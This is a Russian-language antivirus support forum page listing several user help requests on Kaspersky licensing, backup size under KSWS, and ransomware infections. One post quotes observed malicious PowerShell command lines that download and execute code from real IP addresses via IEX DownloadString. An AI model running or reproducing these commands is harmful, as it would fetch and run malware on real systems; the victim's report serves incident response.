GeForce and Radeon
Что выбираете???
133 пользователя проголосовало
У вас нет разрешения голосовать в этом опросе или просматривать его результаты. Пожалуйста, войдите или зарегистрируйтесь для возможности голосования в этом опросе.
-
Похожий контент
-
Автор ameri
Hello and have a good time. My question is whether the Kaspersky license has restrictions to remove and add on one or several different devices. And how many licenses can we remove and add again?
-
Автор МихаилЕ
Добрый день!
После установки KSWS на windows-серверы заметили рост объема ежедневных инкрементных бэкапов, которые делаются с помощью Veeam, в среднем на ~2-4Гб.
До KSWS использовался ESET и подобных проблем не было.
Есть предположение, что изменения вызваны ежедневным обновлением антивирусной базы (каждые 12 ч). Размер C:\ProgramData\Kaspersky Lab в среднем 1,7 Гб. и учитывая, что обновление может успеть произойти дважды до ночного архивирования, сумма прироста подтверждается.
Обычный объем архивируемых данных был 200-500 Мб.
Возможно ли уменьшить объем изменяемых KSWS блоков данных на диске, чтобы уменьшить размер архивов?
Возможно ли перенести размещение баз и temp из C:\ProgramData\Kaspersky Lab в другую папку?
-
Автор Xxandr
Доброго дня!
Защитник (Trojan:Win32/HijackSQLServer.AB) на Win 2016 ликвидирует вот такие критические угрозы. (скриншот 1 и 2) За день таких попыток вредоносное ПО предпринимает несколько раз. Процесс запускается от пользователя MSSQLSERVER.
В случае Win 2008 и с антивирусом Symantec (ISB.Downloader!gen173) также фиксируются и ликвидируются эти угрозы (скриншот 3), однако уже от пользователя NETWORK SERVICE.
В предыдущий раз когда эта проблема была на 2012 винде без антивируса, то эффект был в виде заполнения озу множественными процессами powershell с параметрами типа
CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png
CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png
CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png
CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png
Пожалуйста, помогите побороть эту беду.
-
Автор aa3mandius
Добрый день!
Поймали шифровальщика, формат расширения Gh9ILJq8R
Никакой инфы нет. Сталкивался кто ?
-
Автор AndrewDanilov
Всем доброго дня.
Столкнулись с проблемой зашифровки данных.
Вероятно проникли через RDP порт.
По данным портала https://id-ransomware.malwarehunterteam.com/identify.php?case=e67359c2d3a82a25ca820bb8d43542fc05fdd5e8 это GlobeImposter 2.0
Погуглив по форуму пишут что шансов мало ...
Прикладываю:
1) пример 3х файлов: docx & PDF & файл hta (Архив Files - пароль virus)
2) отчет сканирования по инструкции
3) снимок экрана о вымогательстве
Files.rar FRST.txt
-
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти